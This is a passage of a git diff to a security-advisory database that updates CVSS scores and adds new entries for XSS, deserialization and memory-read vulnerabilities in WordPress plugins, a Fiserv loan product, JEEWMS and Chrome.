@@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:01Z" diff --git a/advisories/unreviewed/2026/02/GHSA-gv3f-578r-jhf3/GHSA-gv3f-578r-jhf3.json b/advisories/unreviewed/2026/02/GHSA-gv3f-578r-jhf3/GHSA-gv3f-578r-jhf3.json index 6bf8778540ce5..4a2d549665e29 100644 --- a/advisories/unreviewed/2026/02/GHSA-gv3f-578r-jhf3/GHSA-gv3f-578r-jhf3.json +++ b/advisories/unreviewed/2026/02/GHSA-gv3f-578r-jhf3/GHSA-gv3f-578r-jhf3.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-gv3f-578r-jhf3", - "modified": "2026-02-20T18:31:34Z", + "modified": "2026-02-24T00:31:32Z", "published": "2026-02-20T18:31:34Z", "aliases": [ "CVE-2025-67990" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RealMag777 GMap Targeting gmap-targeting allows Reflected XSS.This issue affects GMap Targeting: from n/a through <= 1.1.7.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:05Z" diff --git a/advisories/unreviewed/2026/02/GHSA-h68v-wm52-cjcj/GHSA-h68v-wm52-cjcj.json b/advisories/unreviewed/2026/02/GHSA-h68v-wm52-cjcj/GHSA-h68v-wm52-cjcj.json new file mode 100644 index 0000000000000..20ca40487093c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h68v-wm52-cjcj/GHSA-h68v-wm52-cjcj.json @@ -0,0 +1,34 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h68v-wm52-cjcj", + "modified": "2026-02-24T00:31:34Z", + "published": "2026-02-24T00:31:34Z", + "aliases": [ + "CVE-2026-21665" + ], + "details": "The Print Service component of Fiserv Originate Loans Peripherals (formerly Velocity Services) in unsupported version 2021.2.4 (build 4.7.3155.0011) uses deprecated .NET Remoting TCP channels that allow unsafe deserialization of untrusted data. When these services are exposed to an untrusted network in a client-managed deployment, an unauthenticated attacker can achieve remote code execution. Version 2021.2.4 is no longer supported by Fiserv. Customers should upgrade to a currently supported release (2025.1 or later) and ensure that .NET Remoting service ports are not exposed beyond trusted network boundaries.\n\nThis CVE documents behavior observed in a client-hosted deployment running an unsupported legacy version of Originate Loans Peripherals with .NET Remoting ports exposed to an untrusted network. This is not a default or supported configuration. Customers running legacy versions should upgrade to a currently supported release and ensure .NET Remoting ports are restricted to trusted network segments. The finding does not apply to Fiserv-hosted environments.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21665" + }, + { + "type": "WEB", + "url": "https://learn.microsoft.com/en-us/dotnet/core/compatibility/core-libraries/5.0/remoting-apis-obsolete" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T23:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hc97-m5vw-hgpf/GHSA-hc97-m5vw-hgpf.json b/advisories/unreviewed/2026/02/GHSA-hc97-m5vw-hgpf/GHSA-hc97-m5vw-hgpf.json index 59f259e688502..026ac783fcb0f 100644 --- a/advisories/unreviewed/2026/02/GHSA-hc97-m5vw-hgpf/GHSA-hc97-m5vw-hgpf.json +++ b/advisories/unreviewed/2026/02/GHSA-hc97-m5vw-hgpf/GHSA-hc97-m5vw-hgpf.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-hc97-m5vw-hgpf", - "modified": "2026-02-20T18:31:37Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:37Z", "aliases": [ "CVE-2025-69385" ], "details": "Missing Authorization vulnerability in AgniHD Cartify - WooCommerce Gutenberg WordPress Theme cartify allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Cartify - WooCommerce Gutenberg WordPress Theme: from n/a through <= 1.3.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:23Z" diff --git a/advisories/unreviewed/2026/02/GHSA-j69g-gh5p-j2j3/GHSA-j69g-gh5p-j2j3.json b/advisories/unreviewed/2026/02/GHSA-j69g-gh5p-j2j3/GHSA-j69g-gh5p-j2j3.json index 05508e3ee2c20..4be02a4da1f82 100644 --- a/advisories/unreviewed/2026/02/GHSA-j69g-gh5p-j2j3/GHSA-j69g-gh5p-j2j3.json +++ b/advisories/unreviewed/2026/02/GHSA-j69g-gh5p-j2j3/GHSA-j69g-gh5p-j2j3.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-j69g-gh5p-j2j3", - "modified": "2026-02-20T18:31:34Z", + "modified": "2026-02-24T00:31:32Z", "published": "2026-02-20T18:31:34Z", "aliases": [ "CVE-2025-67978" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FixBD Educare educare allows Reflected XSS.This issue affects Educare: from n/a through <= 1.6.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:04Z" diff --git a/advisories/unreviewed/2026/02/GHSA-jxq5-ggfq-q36w/GHSA-jxq5-ggfq-q36w.json b/advisories/unreviewed/2026/02/GHSA-jxq5-ggfq-q36w/GHSA-jxq5-ggfq-q36w.json index 80b8de848cb63..353aefc87743d 100644 --- a/advisories/unreviewed/2026/02/GHSA-jxq5-ggfq-q36w/GHSA-jxq5-ggfq-q36w.json +++ b/advisories/unreviewed/2026/02/GHSA-jxq5-ggfq-q36w/GHSA-jxq5-ggfq-q36w.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-jxq5-ggfq-q36w", - "modified": "2026-02-20T18:31:37Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:37Z", "aliases": [ "CVE-2025-69386" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in realvirtualmx RVCFDI para Woocommerce rvcfdi-para-woocommerce allows Reflected XSS.This issue affects RVCFDI para Woocommerce: from n/a through <= 8.1.8.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:23Z" diff --git a/advisories/unreviewed/2026/02/GHSA-m78j-wv7w-r94w/GHSA-m78j-wv7w-r94w.json b/advisories/unreviewed/2026/02/GHSA-m78j-wv7w-r94w/GHSA-m78j-wv7w-r94w.json index 58423c0a7cd28..f14ea4e1a69d3 100644 --- a/advisories/unreviewed/2026/02/GHSA-m78j-wv7w-r94w/GHSA-m78j-wv7w-r94w.json +++ b/advisories/unreviewed/2026/02/GHSA-m78j-wv7w-r94w/GHSA-m78j-wv7w-r94w.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-m78j-wv7w-r94w", - "modified": "2026-02-20T18:31:33Z", + "modified": "2026-02-24T00:31:32Z", "published": "2026-02-20T18:31:33Z", "aliases": [ "CVE-2025-53233" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RylanH Storyform storyform allows Reflected XSS.This issue affects Storyform: from n/a through <= 0.6.14.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:02Z" diff --git a/advisories/unreviewed/2026/02/GHSA-mhvh-7hfw-2pcj/GHSA-mhvh-7hfw-2pcj.json b/advisories/unreviewed/2026/02/GHSA-mhvh-7hfw-2pcj/GHSA-mhvh-7hfw-2pcj.json index 100d5087ba629..b2d7a7aaef484 100644 --- a/advisories/unreviewed/2026/02/GHSA-mhvh-7hfw-2pcj/GHSA-mhvh-7hfw-2pcj.json +++ b/advisories/unreviewed/2026/02/GHSA-mhvh-7hfw-2pcj/GHSA-mhvh-7hfw-2pcj.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-mhvh-7hfw-2pcj", - "modified": "2026-02-20T18:31:34Z", + "modified": "2026-02-24T00:31:32Z", "published": "2026-02-20T18:31:34Z", "aliases": [ "CVE-2025-67984" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in calliko NPS computy nps-computy allows DOM-Based XSS.This issue affects NPS computy: from n/a through <= 2.8.2.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:04Z" diff --git a/advisories/unreviewed/2026/02/GHSA-mq7f-f783-pc94/GHSA-mq7f-f783-pc94.json b/advisories/unreviewed/2026/02/GHSA-mq7f-f783-pc94/GHSA-mq7f-f783-pc94.json index 5bba14e15ed13..7bd1602891ced 100644 --- a/advisories/unreviewed/2026/02/GHSA-mq7f-f783-pc94/GHSA-mq7f-f783-pc94.json +++ b/advisories/unreviewed/2026/02/GHSA-mq7f-f783-pc94/GHSA-mq7f-f783-pc94.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-mq7f-f783-pc94", - "modified": "2026-02-20T18:31:39Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:39Z", "aliases": [ "CVE-2026-24949" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods PhotoMe photome allows DOM-Based XSS.This issue affects PhotoMe: from n/a through <= 5.7.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:39Z" diff --git a/advisories/unreviewed/2026/02/GHSA-mqj4-m7cg-hx46/GHSA-mqj4-m7cg-hx46.json b/advisories/unreviewed/2026/02/GHSA-mqj4-m7cg-hx46/GHSA-mqj4-m7cg-hx46.json index d505c54d8ccaf..4871d66a695e5 100644 --- a/advisories/unreviewed/2026/02/GHSA-mqj4-m7cg-hx46/GHSA-mqj4-m7cg-hx46.json +++ b/advisories/unreviewed/2026/02/GHSA-mqj4-m7cg-hx46/GHSA-mqj4-m7cg-hx46.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-mqj4-m7cg-hx46", - "modified": "2026-02-20T18:31:35Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:35Z", "aliases": [ "CVE-2025-68501" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mollie Mollie Payments for WooCommerce mollie-payments-for-woocommerce allows Reflected XSS.This issue affects Mollie Payments for WooCommerce: from n/a through <= 8.1.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:10Z" diff --git a/advisories/unreviewed/2026/02/GHSA-mvmh-gv2w-6hrm/GHSA-mvmh-gv2w-6hrm.json b/advisories/unreviewed/2026/02/GHSA-mvmh-gv2w-6hrm/GHSA-mvmh-gv2w-6hrm.json index d9dbefe94ac9d..2a337f5f8d8c5 100644 --- a/advisories/unreviewed/2026/02/GHSA-mvmh-gv2w-6hrm/GHSA-mvmh-gv2w-6hrm.json +++ b/advisories/unreviewed/2026/02/GHSA-mvmh-gv2w-6hrm/GHSA-mvmh-gv2w-6hrm.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-mvmh-gv2w-6hrm", - "modified": "2026-02-20T18:31:36Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:36Z", "aliases": [ "CVE-2025-69323" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VeronaLabs Slimstat Analytics wp-slimstat allows Reflected XSS.This issue affects Slimstat Analytics: from n/a through <= 5.3.2.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:19Z" diff --git a/advisories/unreviewed/2026/02/GHSA-mvp7-2m2r-2548/GHSA-mvp7-2m2r-2548.json b/advisories/unreviewed/2026/02/GHSA-mvp7-2m2r-2548/GHSA-mvp7-2m2r-2548.json index e122c38294277..c7dc55cf19c12 100644 --- a/advisories/unreviewed/2026/02/GHSA-mvp7-2m2r-2548/GHSA-mvp7-2m2r-2548.json +++ b/advisories/unreviewed/2026/02/GHSA-mvp7-2m2r-2548/GHSA-mvp7-2m2r-2548.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-mvp7-2m2r-2548", - "modified": "2026-02-20T18:31:35Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:35Z", "aliases": [ "CVE-2025-69296" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GhostPool Aardvark aardvark allows Reflected XSS.This issue affects Aardvark: from n/a through <= 4.6.3.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:16Z" diff --git a/advisories/unreviewed/2026/02/GHSA-pf6r-4hv7-pr4f/GHSA-pf6r-4hv7-pr4f.json b/advisories/unreviewed/2026/02/GHSA-pf6r-4hv7-pr4f/GHSA-pf6r-4hv7-pr4f.json index 7c8bdd909df0a..b5fecb2639d8d 100644 --- a/advisories/unreviewed/2026/02/GHSA-pf6r-4hv7-pr4f/GHSA-pf6r-4hv7-pr4f.json +++ b/advisories/unreviewed/2026/02/GHSA-pf6r-4hv7-pr4f/GHSA-pf6r-4hv7-pr4f.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pf6r-4hv7-pr4f", - "modified": "2026-02-20T18:31:34Z", + "modified": "2026-02-24T00:31:32Z", "published": "2026-02-20T18:31:34Z", "aliases": [ "CVE-2025-67991" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in vanquish User Extra Fields wp-user-extra-fields allows Reflected XSS.This issue affects User Extra Fields: from n/a through <= 16.8.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:05Z" diff --git a/advisories/unreviewed/2026/02/GHSA-pj5w-7j3v-9wwv/GHSA-pj5w-7j3v-9wwv.json b/advisories/unreviewed/2026/02/GHSA-pj5w-7j3v-9wwv/GHSA-pj5w-7j3v-9wwv.json index 90471ced8be2b..f5ede98af9cdb 100644 --- a/advisories/unreviewed/2026/02/GHSA-pj5w-7j3v-9wwv/GHSA-pj5w-7j3v-9wwv.json +++ b/advisories/unreviewed/2026/02/GHSA-pj5w-7j3v-9wwv/GHSA-pj5w-7j3v-9wwv.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pj5w-7j3v-9wwv", - "modified": "2026-02-20T18:31:35Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:35Z", "aliases": [ "CVE-2025-68854" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in harman79 ID Arrays id-arrays allows DOM-Based XSS.This issue affects ID Arrays: from n/a through <= 2.1.2.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:14Z" diff --git a/advisories/unreviewed/2026/02/GHSA-pjx3-8fqj-x6hr/GHSA-pjx3-8fqj-x6hr.json b/advisories/unreviewed/2026/02/GHSA-pjx3-8fqj-x6hr/GHSA-pjx3-8fqj-x6hr.json index cb1f59587984f..c83a3184a4fac 100644 --- a/advisories/unreviewed/2026/02/GHSA-pjx3-8fqj-x6hr/GHSA-pjx3-8fqj-x6hr.json +++ b/advisories/unreviewed/2026/02/GHSA-pjx3-8fqj-x6hr/GHSA-pjx3-8fqj-x6hr.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pjx3-8fqj-x6hr", - "modified": "2026-02-20T18:31:34Z", + "modified": "2026-02-24T00:31:32Z", "published": "2026-02-20T18:31:34Z", "aliases": [ "CVE-2025-67972" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in fox-themes Prague prague-plugins allows Reflected XSS.This issue affects Prague: from n/a through <= 2.2.8.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:03Z" diff --git a/advisories/unreviewed/2026/02/GHSA-pq2q-m7vr-7342/GHSA-pq2q-m7vr-7342.json b/advisories/unreviewed/2026/02/GHSA-pq2q-m7vr-7342/GHSA-pq2q-m7vr-7342.json index e7cfd796fb0c4..e41fbd68931b8 100644 --- a/advisories/unreviewed/2026/02/GHSA-pq2q-m7vr-7342/GHSA-pq2q-m7vr-7342.json +++ b/advisories/unreviewed/2026/02/GHSA-pq2q-m7vr-7342/GHSA-pq2q-m7vr-7342.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pq2q-m7vr-7342", - "modified": "2026-02-20T18:31:37Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:37Z", "aliases": [ "CVE-2025-69391" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GT3themes Diamond diamond allows Reflected XSS.This issue affects Diamond: from n/a through <= 2.4.8.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:24Z" diff --git a/advisories/unreviewed/2026/02/GHSA-pqpv-94jx-68vg/GHSA-pqpv-94jx-68vg.json b/advisories/unreviewed/2026/02/GHSA-pqpv-94jx-68vg/GHSA-pqpv-94jx-68vg.json new file mode 100644 index 0000000000000..18126d284b5b1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pqpv-94jx-68vg/GHSA-pqpv-94jx-68vg.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pqpv-94jx-68vg", + "modified": "2026-02-24T00:31:33Z", + "published": "2026-02-24T00:31:33Z", + "aliases": [ + "CVE-2026-3028" + ], + "details": "A vulnerability was determined in erzhongxmu JEEWMS up to 3.7. This vulnerability affects the function doAdd of the file src/main/java/com/jeecg/demo/controller/JeecgListDemoController.java. This manipulation of the argument Name causes cross site scripting. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3028" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347384" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347384" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.756527" + }, + { + "type": "WEB", + "url": "https://www.notion.so/JEEWMS-Stored-Cross-Site-Scripting-XSS-in-SysModule-304ea92a3c418099bed7f1e0bca12d83" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T22:16:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qvmx-rqmx-pvfg/GHSA-qvmx-rqmx-pvfg.json b/advisories/unreviewed/2026/02/GHSA-qvmx-rqmx-pvfg/GHSA-qvmx-rqmx-pvfg.json new file mode 100644 index 0000000000000..9ee27e51bca3e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qvmx-rqmx-pvfg/GHSA-qvmx-rqmx-pvfg.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qvmx-rqmx-pvfg", + "modified": "2026-02-24T00:31:34Z", + "published": "2026-02-24T00:31:34Z", + "aliases": [ + "CVE-2026-3061" + ], + "details": "Out of bounds read in Media in Google Chrome prior to 145.0.7632.116 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High)", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3061" + }, + { + "type": "WEB", + "url": "https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_23.html" + }, + { + "type": "WEB", + "url": "https://issues.chromium.org/issues/482862710" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T23:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r8fr-76pj-5h7j/GHSA-r8fr-76pj-5h7j.json b/advisories/unreviewed/2026/02/GHSA-r8fr-76pj-5h7j/GHSA-r8fr-76pj-5h7j.json index bbe7a802209ed..ed5eb046ed33e 100644 --- a/advisories/unreviewed/2026/02/GHSA-r8fr-76pj-5h7j/GHSA-r8fr-76pj-5h7j.json +++ b/advisories/unreviewed/2026/02/GHSA-r8fr-76pj-5h7j/GHSA-r8fr-76pj-5h7j.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-r8fr-76pj-5h7j", - "modified": "2026-02-20T18:31:36Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:36Z", "aliases": [ "CVE-2025-69324" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Basix NEX-Forms nex-forms-express-wp-form-builder allows Stored XSS.This issue affects NEX-Forms: from n/a through <= 9.1.7.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:19Z" diff --git a/advisories/unreviewed/2026/02/GHSA-rg2h-mq39-66pf/GHSA-rg2h-mq39-66pf.json b/advisories/unreviewed/2026/02/GHSA-rg2h-mq39-66pf/GHSA-rg2h-mq39-66pf.json new file mode 100644 index 0000000000000..c4b31b84e91cc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rg2h-mq39-66pf/GHSA-rg2h-mq39-66pf.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rg2h-mq39-66pf", + "modified": "2026-02-24T00:31:34Z", + "published": "2026-02-24T00:31:34Z", + "aliases": [ + "CVE-2026-3043" + ], + "details": "A flaw has been found in itsourcecode Event Management System 1.0. The impacted element is an unknown function of the file /admin/navbar.php. Executing a manipulation of the argument page can lead to cross site scripting. The attack may be performed from remote. The exploit has been published and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3043" + }, + { + "type": "WEB", + "url": "https://github.com/ltranquility/cve_submit/issues/2" + }, + { + "type": "WEB", + "url": "https://itsourcecode.com" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347399" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347399" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.757227" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T00:16:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rv4c-25xc-4f6g/GHSA-rv4c-25xc-4f6g.json b/advisories/unreviewed/2026/02/GHSA-rv4c-25xc-4f6g/GHSA-rv4c-25xc-4f6g.json index 497b1d0b4d452..90c74fab6a7e7 100644 --- a/advisories/unreviewed/2026/02/GHSA-rv4c-25xc-4f6g/GHSA-rv4c-25xc-4f6g.json +++ b/advisories/unreviewed/2026/02/GHSA-rv4c-25xc-4f6g/GHSA-rv4c-25xc-4f6g.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-rv4c-25xc-4f6g", - "modified": "2026-02-20T18:31:35Z", + "modified": "2026-02-24T00:31:33Z", "published": "2026-02-20T18:31:35Z", "aliases": [ "CVE-2025-68848" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in anmari amr cron manager amr-cron-manager allows Reflected XSS.This issue affects amr cron manager: from n/a through <= 2.3.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": 